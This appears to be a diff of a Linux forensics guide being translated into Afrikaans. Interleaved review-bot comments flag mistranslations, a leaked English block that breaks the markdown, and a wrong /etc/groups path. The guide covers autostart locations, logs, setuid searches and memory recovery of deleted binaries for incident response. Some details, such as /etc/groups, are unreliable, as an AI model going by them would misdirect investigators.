To uncover software installed manually or outside of these package managers, explore directories like **_`/usr/local`_**, **_`/opt`_**, **_`/usr/sbin`_**, **_`/usr/bin`_**, **_`/bin`_**, and **_`/sbin`_**. Combine directory listings with system-specific commands to identify executables not associated with known packages, enhancing your search for all installed programs.
|
||||
- RedHat-gebruikers kan die RPM-databasis ondervra met `rpm -qa --root=/mntpath/var/lib/rpm` om geïnstalleerde pakkette te lys.
|
||||
|
||||
Om sagteware wat handmatig of buite hierdie pakketsbestuurders geïnstalleer is, op te spoor, verken gidslyste soos **_`/usr/local`_**, **_`/opt`_**, **_`/usr/sbin`_**, **_`/usr/bin`_**, **_`/bin`_**, en **_`/sbin`_**. Kombineer gidslyste met stelselspesifieke opdragte om uitvoerbare lêers te identifiseer wat nie met bekende pakkette geassosieer word nie, en verbeter soek na alle geïnstalleerde programme.
|
||||
```bash
|
||||
# Debian package and log details
|
||||
cat /var/lib/dpkg/status | grep -E "Package:|Status:"
|
||||
|
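Review bot: the new Afrikaans wording for "directories" is wrong in two places in this hunk: "handmatige kontroles in algemene gidslys" and "verken gidslyste soos **_`/usr/local`_**" use "gidslys(te)", which means a directory listing, where the source says "directories"; "gidse" is the term (the one spot where "gidslyste" is right is "Kombineer gidslyste met stelselspesifieke opdragte", since that sentence really is about listings). Also "pakketaanbringings" reads oddly for "package installations" (suggest "pakketinstallasies"), "pakketsbestuurders" should be "pakketbestuurders", and the heading "### Gewysigde Sisteemlêers" uses "sisteem" while the body of the same hunk uses "stelsel" ("stelsellogboeke", "RedHat-gebaseerde stelsels"); pick one term and keep it.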
@ -213,30 +200,46 @@ find /sbin/ –exec rpm -qf {} \; | grep "is not"
|
|||
# Find exacuable files
|
||||
find / -type f -executable | grep <something>
|
||||
```
|
||||
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
Get Access Today:
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werksvloeie te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\
|
||||
Kry vandag toegang:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
||||
## Recover Deleted Running Binaries
|
||||
|
||||
Imagina a process taht was executed from /tmp/exec and deleted. It's possible to extract it
|
||||
## Herstel Verwyderde Lopende Binêre Lêers
|
||||
|
||||
Stel jou voor 'n proses wat uitgevoer is vanaf /tmp/exec en verwyder is. Dit is moontlik om dit te onttrek.
|
||||
```bash
|
||||
cd /proc/3746/ #PID with the exec file deleted
|
||||
head -1 maps #Get address of the file. It was 08048000-08049000
|
||||
dd if=mem bs=1 skip=08048000 count=1000 of=/tmp/exec2 #Recorver it
|
||||
```
|
||||
## Inspekteer Autostart-plekke
|
||||
|
||||
## Inspect Autostart locations
|
||||
### Geskeduleerde Take
|
||||
|
||||
### Scheduled Tasks
|
||||
```html
|
||||
Scheduled tasks are a common way for programs to run automatically at specific times or intervals. In Linux, the cron daemon is responsible for managing scheduled tasks. To inspect scheduled tasks, you can check the contents of the `/etc/cron.d/` directory and the user-specific cron files located in `/var/spool/cron/crontabs/`.
|
||||
|
||||
To view the contents of the `/etc/cron.d/` directory, you can use the following command:
|
||||
|
||||
```bash
|
||||
ls -l /etc/cron.d/
|
||||
```
|
||||
|
||||
This will display a list of files that correspond to scheduled tasks. Each file represents a separate task and contains the command to be executed and the schedule for when it should run.
|
||||
|
||||
To view the user-specific cron files, you can use the following command:
|
||||
|
||||
```bash
|
||||
ls -l /var/spool/cron/crontabs/
|
||||
```
|
||||
|
||||
This will display a list of files that correspond to the cron files for each user. Each file represents a separate user and contains their individual scheduled tasks.
|
||||
|
||||
Inspecting these autostart locations can help identify any suspicious or unauthorized tasks that may be running on the system.
|
||||
```
|
||||
```bash
|
||||
cat /var/spool/cron/crontabs/* \
|
||||
/var/spool/cron/atjobs \
|
||||
|
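Review bot: the block opened with ```html right after "### Scheduled Tasks" (from "Scheduled tasks are a common way for programs to run automatically at specific times or intervals." down to "Inspecting these autostart locations can help identify any suspicious or unauthorized tasks ...") is neither HTML nor Afrikaans; it is English explanatory prose with two ```bash fences nested inside it, and the first inner fence ("```bash" / "ls -l /etc/cron.d/" / "```") closes the outer ```html block early, so the rest of the section renders as broken markdown. This looks like translator output that leaked into the page: drop the whole ```html block so the heading is followed directly by the existing "```bash" / "cat /var/spool/cron/crontabs/* \" listing, or, if the explanation is wanted, keep it as plain Afrikaans paragraphs outside any fence. Two smaller points: the new heading "## Inspekteer Autostart-plekke" should agree with "### Ander outomatiese opstartlokasies" later in the file (suggest "outomatiese opstartplekke" in both), and the context lines "# Find exacuable files" and "#Recorver it" carry typos ("executable", "Recover") that could be fixed in the same commit.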
@ -250,63 +253,62 @@ cat /var/spool/cron/crontabs/* \
|
|||
#MacOS
|
||||
ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/
|
||||
```
|
||||
### Dienste
|
||||
|
||||
### Services
|
||||
Paaie waar 'n kwaadwillige program as 'n diens geïnstalleer kan word:
|
||||
|
||||
Paths where a malware could be isntalled as a service:
|
||||
|
||||
- **/etc/inittab**: Calls initialization scripts like rc.sysinit, directing further to startup scripts.
|
||||
- **/etc/rc.d/** and **/etc/rc.boot/**: Contain scripts for service startup, the latter being found in older Linux versions.
|
||||
- **/etc/init.d/**: Used in certain Linux versions like Debian for storing startup scripts.
|
||||
- Services may also be activated via **/etc/inetd.conf** or **/etc/xinetd/**, depending on the Linux variant.
|
||||
- **/etc/systemd/system**: A directory for system and service manager scripts.
|
||||
- **/etc/systemd/system/multi-user.target.wants/**: Contains links to services that should be started in a multi-user runlevel.
|
||||
- **/usr/local/etc/rc.d/**: For custom or third-party services.
|
||||
- **~/.config/autostart/**: For user-specific automatic startup applications, which can be a hiding spot for user-targeted malware.
|
||||
- **/lib/systemd/system/**: System-wide default unit files provided by installed packages.
|
||||
- **/etc/inittab**: Roep inisialiseringsskripte soos rc.sysinit aan, wat verder verwys na opstartskripte.
|
||||
- **/etc/rc.d/** en **/etc/rc.boot/**: Bevat skripte vir diensopstart, waarvan die laasgenoemde in ouer Linux-weergawes gevind word.
|
||||
- **/etc/init.d/**: Word gebruik in sekere Linux-weergawes soos Debian om opstartskripte te stoor.
|
||||
- Dienste kan ook geaktiveer word via **/etc/inetd.conf** of **/etc/xinetd/**, afhangende van die Linux-variant.
|
||||
- **/etc/systemd/system**: 'n Gids vir stelsel- en diensbestuurskripte.
|
||||
- **/etc/systemd/system/multi-user.target.wants/**: Bevat skakels na dienste wat in 'n multi-gebruiker vlak gestart moet word.
|
||||
- **/usr/local/etc/rc.d/**: Vir aangepaste of derdeparty-dienste.
|
||||
- **~/.config/autostart/**: Vir gebruikersspesifieke outomatiese opstarttoepassings, wat 'n versteekte plek vir gebruikersgerigte kwaadwillige programme kan wees.
|
||||
- **/lib/systemd/system/**: Stelselwye verstek eenheidslêers wat deur geïnstalleerde pakkette voorsien word.
|
||||
|
||||
|
||||
### Kernel Modules
|
||||
### Kernelmodules
|
||||
|
||||
Linux kernel modules, often utilized by malware as rootkit components, are loaded at system boot. The directories and files critical for these modules include:
|
||||
Linux-kernelmodules, dikwels deur kwaadwillige programme as rootkit-komponente gebruik, word by stelselopstart gelaai. Die kritieke gids en lêers vir hierdie modules sluit in:
|
||||
|
||||
- **/lib/modules/$(uname -r)**: Holds modules for the running kernel version.
|
||||
- **/etc/modprobe.d**: Contains configuration files to control module loading.
|
||||
- **/etc/modprobe** and **/etc/modprobe.conf**: Files for global module settings.
|
||||
- **/lib/modules/$(uname -r)**: Bevat modules vir die lopende kernelweergawe.
|
||||
- **/etc/modprobe.d**: Bevat konfigurasie-lêers om modulelaaiing te beheer.
|
||||
- **/etc/modprobe** en **/etc/modprobe.conf**: Lêers vir globale module-instellings.
|
||||
|
||||
### Other Autostart Locations
|
||||
### Ander outomatiese opstartlokasies
|
||||
|
||||
Linux employs various files for automatically executing programs upon user login, potentially harboring malware:
|
||||
Linux maak gebruik van verskeie lêers om programme outomaties uit te voer wanneer 'n gebruiker aanmeld, wat potensieel kwaadwillige programme kan bevat:
|
||||
|
||||
- **/etc/profile.d/***, **/etc/profile**, and **/etc/bash.bashrc**: Executed for any user login.
|
||||
- **~/.bashrc**, **~/.bash_profile**, **~/.profile**, and **~/.config/autostart**: User-specific files that run upon their login.
|
||||
- **/etc/rc.local**: Runs after all system services have started, marking the end of the transition to a multiuser environment.
|
||||
- **/etc/profile.d/***, **/etc/profile**, en **/etc/bash.bashrc**: Uitgevoer vir enige gebruikersaanmelding.
|
||||
- **~/.bashrc**, **~/.bash_profile**, **~/.profile**, en **~/.config/autostart**: Gebruikersspesifieke lêers wat uitgevoer word wanneer hulle aanmeld.
|
||||
- **/etc/rc.local**: Word uitgevoer nadat alle stelseldienste gestart het, wat die einde van die oorgang na 'n multi-gebruiker omgewing aandui.
|
||||
|
||||
## Examine Logs
|
||||
## Ondersoek Loglêers
|
||||
|
||||
Linux systems track user activities and system events through various log files. These logs are pivotal for identifying unauthorized access, malware infections, and other security incidents. Key log files include:
|
||||
Linux-stelsels hou gebruikersaktiwiteite en stelselgebeure by deur middel van verskeie loglêers. Hierdie loglêers is van kritieke belang vir die identifisering van ongemagtigde toegang, kwaadwillige infeksies en ander sekuriteitsvoorvalle. Sleutelloglêers sluit in:
|
||||
|
||||
- **/var/log/syslog** (Debian) or **/var/log/messages** (RedHat): Capture system-wide messages and activities.
|
||||
- **/var/log/auth.log** (Debian) or **/var/log/secure** (RedHat): Record authentication attempts, successful and failed logins.
|
||||
- Use `grep -iE "session opened for|accepted password|new session|not in sudoers" /var/log/auth.log` to filter relevant authentication events.
|
||||
- **/var/log/boot.log**: Contains system startup messages.
|
||||
- **/var/log/maillog** or **/var/log/mail.log**: Logs email server activities, useful for tracking email-related services.
|
||||
- **/var/log/kern.log**: Stores kernel messages, including errors and warnings.
|
||||
- **/var/log/dmesg**: Holds device driver messages.
|
||||
- **/var/log/faillog**: Records failed login attempts, aiding in security breach investigations.
|
||||
- **/var/log/cron**: Logs cron job executions.
|
||||
- **/var/log/daemon.log**: Tracks background service activities.
|
||||
- **/var/log/btmp**: Documents failed login attempts.
|
||||
- **/var/log/httpd/**: Contains Apache HTTPD error and access logs.
|
||||
- **/var/log/mysqld.log** or **/var/log/mysql.log**: Logs MySQL database activities.
|
||||
- **/var/log/xferlog**: Records FTP file transfers.
|
||||
- **/var/log/**: Always check for unexpected logs here.
|
||||
- **/var/log/syslog** (Debian) of **/var/log/messages** (RedHat): Vang stelselwye boodskappe en aktiwiteite op.
|
||||
- **/var/log/auth.log** (Debian) of **/var/log/secure** (RedHat): Neem outentiseringspogings, suksesvolle en mislukte aanmeldings op.
|
||||
- Gebruik `grep -iE "session opened for|accepted password|new session|not in sudoers" /var/log/auth.log` om relevante outentiseringsgebeure te filter.
|
||||
- **/var/log/boot.log**: Bevat stelselopstartboodskappe.
|
||||
- **/var/log/maillog** of **/var/log/mail.log**: Log e-posbedieneraktiwiteite, nuttig vir die opspoor van e-posverwante dienste.
|
||||
- **/var/log/kern.log**: Stoor kernelboodskappe, insluitend foute en waarskuwings.
|
||||
- **/var/log/dmesg**: Bevat toestuurprogramboodskappe.
|
||||
- **/var/log/faillog**: Neem mislukte aanmeldingspogings op, wat help met sekuriteitskrisisondersoeke.
|
||||
- **/var/log/cron**: Log cron-werkuitvoerings.
|
||||
- **/var/log/daemon.log**: Volg agtergronddiensaktiwiteite.
|
||||
- **/var/log/btmp**: Dokumenteer mislukte aanmeldingspogings.
|
||||
- **/var/log/httpd/**: Bevat Apache HTTPD-fout- en toegangsloglêers.
|
||||
- **/var/log/mysqld.log** of **/var/log/mysql.log**: Log MySQL-databasisaktiwiteite.
|
||||
- **/var/log/xferlog**: Neem FTP-lêeroordragte op.
|
||||
- **/var/log/**: Kontroleer altyd vir onverwagte loglêers hier.
|
||||
|
||||
{% hint style="info" %}
|
||||
Linux system logs and audit subsystems may be disabled or deleted in an intrusion or malware incident. Because logs on Linux systems generally contain some of the most useful information about malicious activities, intruders routinely delete them. Therefore, when examining available log files, it is important to look for gaps or out of order entries that might be an indication of deletion or tampering.
|
||||
Linux-stelselloglêers en oudit-subsisteme kan gedeaktiveer of uitgewis word tydens 'n inbreuk of kwaadwillige voorval. Omdat loglêers op Linux-stelsels gewoonlik van die nuttigste inligting oor kwaadwillige aktiwiteite bevat, verwyder indringers dit gereeld. Daarom is dit belangrik om, wanneer beskikbare loglêers ondersoek word, te kyk vir gaping of uit plek ininskrywings wat 'n aanduiding van uitwissing of manipulasie kan wees.
|
||||
{% endhint %}
|
||||
|
||||
**Linux maintains a command history for each user**, stored in:
|
||||
**Linux hou 'n opdraggeskiedenis vir elke gebruiker by**, gestoor in:
|
||||
|
||||
- ~/.bash_history
|
||||
- ~/.zsh_history
|
||||
|
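Review bot: two translation errors in the new log-file list and hint: "**/var/log/dmesg**: Bevat toestuurprogramboodskappe." renders "device driver messages" with a non-word (suggest "toesteldrywerboodskappe"), and "te kyk vir gaping of uit plek ininskrywings" has a typo plus a word-for-word calque of "out of order entries"; suggest "te kyk vir gapings of inskrywings buite volgorde". Also "multi-gebruiker vlak" drops "runlevel" from "multi-user runlevel" (suggest keeping "runlevel", since the other technical terms in this hunk such as "rootkit" and "rc.sysinit" stay untranslated), "Die kritieke gids en lêers vir hierdie modules" should be plural "gidse", and this hunk consistently uses "kwaadwillige programme" while the headings earlier in the file keep "Malware" ("## Soek na bekende Malware", "### Malware/Rootkit Detekteerders"); one term throughout would help the reader.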
@ -314,42 +316,39 @@ Linux system logs and audit subsystems may be disabled or deleted in an intrusio
|
|||
- ~/.python_history
|
||||
- ~/.*_history
|
||||
|
||||
Moreover, the `last -Faiwx` command provides a list of user logins. Check it for unknown or unexpected logins.
|
||||
Verder verskaf die `last -Faiwx`-opdrag 'n lys van gebruikersaanmeldings. Kontroleer dit vir onbekende of onverwagte aanmeldings.
|
||||
|
||||
Check files that can grant extra rprivileges:
|
||||
Kontroleer lêers wat ekstra regte kan verleen:
|
||||
|
||||
- Review `/etc/sudoers` for unanticipated user privileges that may have been granted.
|
||||
- Review `/etc/sudoers.d/` for unanticipated user privileges that may have been granted.
|
||||
- Examine `/etc/groups` to identify any unusual group memberships or permissions.
|
||||
- Examine `/etc/passwd` to identify any unusual group memberships or permissions.
|
||||
- Ondersoek `/etc/sudoers` vir onverwagte gebruikersregte wat moontlik toegeken is.
|
||||
- Ondersoek `/etc/sudoers.d/` vir onverwagte gebruikersregte wat moontlik toegeken is.
|
||||
- Ondersoek `/etc/groups` om enige ongewone groepslidmaatskappe of -regte te identifiseer.
|
||||
- Ondersoek `/etc/passwd` om enige ongewone groepslidmaatskappe of -regte te identifiseer.
|
||||
|
||||
Some apps alse generates its own logs:
|
||||
Sommige programme genereer ook hul eie loglêers:
|
||||
|
||||
- **SSH**: Examine _~/.ssh/authorized_keys_ and _~/.ssh/known_hosts_ for unauthorized remote connections.
|
||||
- **Gnome Desktop**: Look into _~/.recently-used.xbel_ for recently accessed files via Gnome applications.
|
||||
- **Firefox/Chrome**: Check browser history and downloads in _~/.mozilla/firefox_ or _~/.config/google-chrome_ for suspicious activities.
|
||||
- **VIM**: Review _~/.viminfo_ for usage details, such as accessed file paths and search history.
|
||||
- **Open Office**: Check for recent document access that may indicate compromised files.
|
||||
- **FTP/SFTP**: Review logs in _~/.ftp_history_ or _~/.sftp_history_ for file transfers that might be unauthorized.
|
||||
- **MySQL**: Investigate _~/.mysql_history_ for executed MySQL queries, potentially revealing unauthorized database activities.
|
||||
- **Less**: Analyze _~/.lesshst_ for usage history, including viewed files and commands executed.
|
||||
- **Git**: Examine _~/.gitconfig_ and project _.git/logs_ for changes to repositories.
|
||||
- **SSH**: Ondersoek _~/.ssh/authorized_keys_ en _~/.ssh/known_hosts_ vir ongemagtigde afstandsverbindinge.
|
||||
- **Gnome Desktop**: Kyk na _~/.recently-used.xbel_ vir onlangs benaderde lêers via Gnome-toepassings.
|
||||
- **Firefox/Chrome**: Kontroleer blaaiergeskiedenis en aflaaiers in _~/.mozilla/firefox_ of _~/.config/google-chrome_ vir verdagte aktiwiteite.
|
||||
- **VIM**: Ondersoek _~/.viminfo_ vir gebruiksdetails, soos benaderde lêerpaadjies en soekgeskiedenis.
|
||||
- **Open Office**: Kyk vir onlangse dokumenttoegang wat dui op gekompromitteerde lêers.
|
||||
- **FTP/SFTP**: Ondersoek loglêers in _~/.ftp_history_ of _~/.sftp_history_ vir lêeroordragte wat moontlik ongemagtig is.
|
||||
- **MySQL**: Ondersoek _~/.mysql_history_ vir uitgevoerde MySQL-navrae, wat moontlik ongemagtigde databasisaktiwiteite kan onthul.
|
||||
- **Less**: Analiseer _~/.lesshst_ vir gebruiksgeskiedenis, insluitend besigtigde lêers en uitgevoerde opdragte.
|
||||
- **Git**: Ondersoek _~/.gitconfig_ en projek _.git/logs_ vir veranderinge aan bewaarplekke.
|
||||
|
||||
### USB Logs
|
||||
### USB-loglêers
|
||||
|
||||
[**usbrip**](https://github.com/snovvcrash/usbrip) is a small piece of software written in pure Python 3 which parses Linux log files (`/var/log/syslog*` or `/var/log/messages*` depending on the distro) for constructing USB event history tables.
|
||||
[**usbrip**](https://github.com/snovvcrash/usbrip) is 'n klein stukkie sagteware wat in suiwer Python 3 geskryf is en Linux-loglêers (`/var/log/syslog*` of `/var/log/messages*` afhangende van die distribusie) ontleed om USB-gebeurtenisgeskiedenis-tabelle saam te stel.
|
||||
|
||||
It is interesting to **know all the USBs that have been used** and it will be more useful if you have an authorized list of USBs to find "violation events" (the use of USBs that aren't inside that list).
|
||||
|
||||
### Installation
|
||||
Dit is interessant om **alle USB's wat gebruik is**, te ken en dit sal nuttiger wees as jy 'n geoorloofde lys van USB's het om "oortredingsgebeure" (die gebruik van USB's wat nie binne daardie lys val nie) te vind.
|
||||
|
||||
### Installasie
|
||||
```bash
|
||||
pip3 install usbrip
|
||||
usbrip ids download #Download USB ID database
|
||||
```
|
||||
|
||||
### Examples
|
||||
|
||||
### Voorbeelde
|
||||
```bash
|
||||
usbrip events history #Get USB history of your curent linux machine
|
||||
usbrip events history --pid 0002 --vid 0e0f --user kali #Search by pid OR vid OR user
|
||||
|
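Review bot: the translated Open Office bullet changes the meaning: "Kyk vir onlangse dokumenttoegang wat dui op gekompromitteerde lêers." states that recent access indicates compromise, whereas the source says it "may indicate"; suggest "wat moontlik op gekompromitteerde lêers kan dui". While these lines are in the hunk, "/etc/groups" in "Ondersoek `/etc/groups` om enige ongewone groepslidmaatskappe of -regte te identifiseer." (and in the removed English line) is not a file on Linux; group membership lives in `/etc/group`, so the path should be corrected rather than carried over into the translation. Minor: "aflaaiers" in the Firefox/Chrome bullet means "downloaders"; "aflaaie" is the word for downloads.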
@ -357,115 +356,109 @@ usbrip events history --pid 0002 --vid 0e0f --user kali #Search by pid OR vid OR
|
|||
usbrip ids download #Downlaod database
|
||||
usbrip ids search --pid 0002 --vid 0e0f #Search for pid AND vid
|
||||
```
|
||||
|
||||
More examples and info inside the github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip)
|
||||
Meer voorbeelde en inligting binne die github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip)
|
||||
|
||||
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
Get Access Today:
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werkstrome te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\
|
||||
Kry vandag toegang:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
||||
|
||||
|
||||
## Review User Accounts and Logon Activities
|
||||
## Oorsig van Gebruikersrekeninge en Aantekenaktiwiteite
|
||||
|
||||
Examine the _**/etc/passwd**_, _**/etc/shadow**_ and **security logs** for unusual names or accounts created and or used in close proximity to known unauthorized events. Also, check possible sudo brute-force attacks.\
|
||||
Moreover, check files like _**/etc/sudoers**_ and _**/etc/groups**_ for unexpected privileges given to users.\
|
||||
Finally, look for accounts with **no passwords** or **easily guessed** passwords.
|
||||
Ondersoek die _**/etc/passwd**_, _**/etc/shadow**_ en **sekuriteitslêers** vir ongewone name of rekeninge wat geskep is en/of gebruik is in die nabyheid van bekende ongemagtigde gebeure. Kyk ook na moontlike sudo-bruteforce-aanvalle.\
|
||||
Verder, kyk na lêers soos _**/etc/sudoers**_ en _**/etc/groups**_ vir onverwagte voorregte wat aan gebruikers gegee is.\
|
||||
Kyk uiteindelik vir rekeninge sonder wagwoorde of maklik raai wagwoorde.
|
||||
|
||||
## Examine File System
|
||||
## Ondersoek Lêersisteem
|
||||
|
||||
### Analyzing File System Structures in Malware Investigation
|
||||
### Analise van Lêersisteemstrukture in Malware-ondersoek
|
||||
|
||||
When investigating malware incidents, the structure of the file system is a crucial source of information, revealing both the sequence of events and the malware's content. However, malware authors are developing techniques to hinder this analysis, such as modifying file timestamps or avoiding the file system for data storage.
|
||||
Wanneer malware-voorvalle ondersoek word, is die struktuur van die lêersisteem 'n belangrike bron van inligting wat beide die volgorde van gebeure en die inhoud van die malware onthul. Tog ontwikkel malware-skrywers tegnieke om hierdie analise te bemoeilik, soos die wysiging van lêerstempels of die vermyding van die lêersisteem vir data-opberging.
|
||||
|
||||
To counter these anti-forensic methods, it's essential to:
|
||||
|
||||
- **Conduct a thorough timeline analysis** using tools like **Autopsy** for visualizing event timelines or **Sleuth Kit's** `mactime` for detailed timeline data.
|
||||
- **Investigate unexpected scripts** in the system's $PATH, which might include shell or PHP scripts used by attackers.
|
||||
- **Examine `/dev` for atypical files**, as it traditionally contains special files, but may house malware-related files.
|
||||
- **Search for hidden files or directories** with names like ".. " (dot dot space) or "..^G" (dot dot control-G), which could conceal malicious content.
|
||||
- **Identify setuid root files** using the command:
|
||||
```find / -user root -perm -04000 -print```
|
||||
This finds files with elevated permissions, which could be abused by attackers.
|
||||
- **Review deletion timestamps** in inode tables to spot mass file deletions, possibly indicating the presence of rootkits or trojans.
|
||||
- **Inspect consecutive inodes** for nearby malicious files after identifying one, as they may have been placed together.
|
||||
- **Check common binary directories** (_/bin_, _/sbin_) for recently modified files, as these could be altered by malware.
|
||||
Om hierdie teen-forensiese metodes te teenwerk, is dit noodsaaklik om:
|
||||
|
||||
- **'n Deeglike tydlyn-analise uit te voer** met behulp van instrumente soos **Autopsy** om gebeurtenis-tydlyne te visualiseer of **Sleuth Kit se** `mactime` vir gedetailleerde tydlyn-data.
|
||||
- **Onverwagte skripte in die $PATH van die stelsel te ondersoek**, wat skulpskote of PHP-skripte wat deur aanvallers gebruik word, kan insluit.
|
||||
- **`/dev` te ondersoek vir ongewone lêers**, aangesien dit tradisioneel spesiale lêers bevat, maar moontlik malware-verwante lêers kan huisves.
|
||||
- **Te soek na verskuilde lêers of gidslyne** met name soos ".. " (punt punt spasie) of "..^G" (punt punt beheer-G), wat kwaadwillige inhoud kan verberg.
|
||||
- **Setuid-root-lêers te identifiseer** met behulp van die opdrag:
|
||||
```find / -user root -perm -04000 -print```
|
||||
Dit vind lêers met verhoogde voorregte wat deur aanvallers misbruik kan word.
|
||||
- **Verwyderingstempelmerkers** in inode-tabelle te hersien om massiewe lêerverwyderings op te spoor, wat moontlik die teenwoordigheid van rootkits of trojane aandui.
|
||||
- **Opeenvolgende inodes te ondersoek** vir nabygeleë kwaadwillige lêers nadat een geïdentifiseer is, aangesien hulle saam geplaas kon wees.
|
||||
- **Gewone binêre gidslyne** (_/bin_, _/sbin_) te ondersoek vir onlangs gewysigde lêers, aangesien hierdie deur malware gewysig kon word.
|
||||
```bash
|
||||
# List recent files in a directory:
|
||||
# List recent files in a directory:
|
||||
ls -laR --sort=time /bin```
|
||||
|
||||
# Sort files in a directory by inode:
|
||||
# Sort files in a directory by inode:
|
||||
ls -lai /bin | sort -n```
|
||||
```
|
||||
|
||||
{% hint style="info" %}
|
||||
Note that an **attacker** can **modify** the **time** to make **files appear** **legitimate**, but he **cannot** modify the **inode**. If you find that a **file** indicates that it was created and modified at the **same time** as the rest of the files in the same folder, but the **inode** is **unexpectedly bigger**, then the **timestamps of that file were modified**.
|
||||
Let daarop dat 'n **aanvaller** die **tyd** kan **verander** om **lêers te laat voorkom** asof dit **wettig** is, maar hy kan die **inode** nie verander nie. As jy vind dat 'n **lêer** aandui dat dit geskep en verander is op dieselfde tyd as die res van die lêers in dieselfde vouer, maar die **inode** onverwags groter is, dan is die **tydstempels van daardie lêer verander**.
|
||||
{% endhint %}
|
||||
|
||||
## Compare files of different filesystem versions
|
||||
## Vergelyk lêers van verskillende lêersisteemweergawes
|
||||
|
||||
### Filesystem Version Comparison Summary
|
||||
### Opsomming van Vergelyking van Lêersisteemweergawes
|
||||
|
||||
To compare filesystem versions and pinpoint changes, we use simplified `git diff` commands:
|
||||
Om lêersisteemweergawes te vergelyk en veranderinge te identifiseer, gebruik ons vereenvoudigde `git diff`-opdragte:
|
||||
|
||||
- **To find new files**, compare two directories:
|
||||
- **Om nuwe lêers te vind**, vergelyk twee gidsen:
|
||||
```bash
|
||||
git diff --no-index --diff-filter=A path/to/old_version/ path/to/new_version/
|
||||
```
|
||||
|
||||
- **For modified content**, list changes while ignoring specific lines:
|
||||
- **Vir gewysigde inhoud**, lys veranderinge terwyl spesifieke lyne geïgnoreer word:
|
||||
```bash
|
||||
git diff --no-index --diff-filter=M path/to/old_version/ path/to/new_version/ | grep -E "^\+" | grep -v "Installed-Time"
|
||||
```
|
||||
|
||||
- **To detect deleted files**:
|
||||
- **Om uitgewisde lêers op te spoor**:
|
||||
```bash
|
||||
git diff --no-index --diff-filter=D path/to/old_version/ path/to/new_version/
|
||||
```
|
||||
- **Filteropsies** (`--diff-filter`) help om te versmalling na spesifieke veranderinge soos bygevoeg (`A`), verwyder (`D`), of gewysig (`M`) lêers.
|
||||
- `A`: Bygevoegde lêers
|
||||
- `C`: Gekopieerde lêers
|
||||
- `D`: Verwyderde lêers
|
||||
- `M`: Gewysigde lêers
|
||||
- `R`: Hernoemde lêers
|
||||
- `T`: Tipe veranderinge (bv. lêer na simbooliese skakel)
|
||||
- `U`: Onversoenbare lêers
|
||||
- `X`: Onbekende lêers
|
||||
- `B`: Gebroke lêers
|
||||
|
||||
- **Filter options** (`--diff-filter`) help narrow down to specific changes like added (`A`), deleted (`D`), or modified (`M`) files.
|
||||
- `A`: Added files
|
||||
- `C`: Copied files
|
||||
- `D`: Deleted files
|
||||
- `M`: Modified files
|
||||
- `R`: Renamed files
|
||||
- `T`: Type changes (e.g., file to symlink)
|
||||
- `U`: Unmerged files
|
||||
- `X`: Unknown files
|
||||
- `B`: Broken files
|
||||
|
||||
## References
|
||||
## Verwysings
|
||||
|
||||
* [https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf](https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf)
|
||||
* [https://www.plesk.com/blog/featured/linux-logs-explained/](https://www.plesk.com/blog/featured/linux-logs-explained/)
|
||||
* [https://git-scm.com/docs/git-diff#Documentation/git-diff.txt---diff-filterACDMRTUXB82308203](https://git-scm.com/docs/git-diff#Documentation/git-diff.txt---diff-filterACDMRTUXB82308203)
|
||||
* **Book: Malware Forensics Field Guide for Linux Systems: Digital Forensics Field Guides**
|
||||
* **Boek: Malware Forensics Field Guide for Linux Systems: Digital Forensics Field Guides**
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
